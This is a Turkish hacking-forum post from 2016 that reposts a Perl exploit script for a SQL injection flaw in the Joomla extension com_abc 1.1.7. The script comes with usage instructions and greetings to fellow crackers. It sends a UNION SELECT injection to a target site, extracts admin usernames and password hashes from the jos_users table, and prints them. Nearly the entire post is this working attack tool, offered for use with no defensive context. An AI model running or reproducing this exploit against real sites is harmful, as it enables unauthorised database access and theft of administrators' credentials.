ABC Joomla Extension SQL Injection Exploit

'Tool' forumunda KaliBot tarafından 22 Şubat 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    573
    Beğeniler:
    65
    Ödül Puanları:
    12
    Web Sitesi:

    Kod:
    #!/usr/bin/perl
    
    #***********************************************************************#
    #                                                                       #
    # [o] ABC Joomla Extension SQL Injection Exploit                        #
    #      Software : com_abc version 1.1.7                                 #
    #      Vendor   : http://www.airiny.com/                                #
    #      Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
    #      Contact  : public[at]antisecurity[dot]org                        #
    #      Home     : http://antisecurity.org/                              #
    #                                                                       #
    # [o] Usage                                                             #
    #      root@evilc0de:~# perl abc.pl www.target.com                      #
    #                                                                       #
    # [o] Greetz                                                            #
    #      Angela Zhang stardustmemory aJe martfella pizzyroot Genex        #
    #      H312Y yooogy mousekill }^-^{ noname matthews wishnusakti         #
    #      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11             #
    #                                                                       #
    # [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia                     #
    #                                                                       #
    #***********************************************************************#
    
    use HTTP::Request;
    use LWP::UserAgent;
    
    my $target = $ARGV[0];
    my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';
    my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
    print "\n[x]===============================================[x]\n";
    print "[x]  ABC Joomla Extension SQL Injection Exploit   [x]\n";
    print "[x]            [C]oded By AntiSecurity            [x]\n";
    print "[x]===============================================[x]\n\n";
    
    my $exploit = "http://".$target.$file_vuln.$sql_query;
    
    my $request   = HTTP::Request->new(GET=>$exploit);
    my $useragent = LWP::UserAgent->new();
    $useragent->timeout(10);
    my $response  = $useragent->request($request);
    if ($response->is_success) {
    my $res   = $response->content;
    if ($res =~ m/:(.*):(.*):/g) {
    my ($username,$password) = ($1,$2);
    print "[+] $username:$password \n\n";
    }
    else { print "[-] Error, Fail to get admin login.\n\n"; }
    }
    else { print "[-] Error, ".$response->status_line."\n\n"; }
     

Bu Sayfayı Paylaş

Share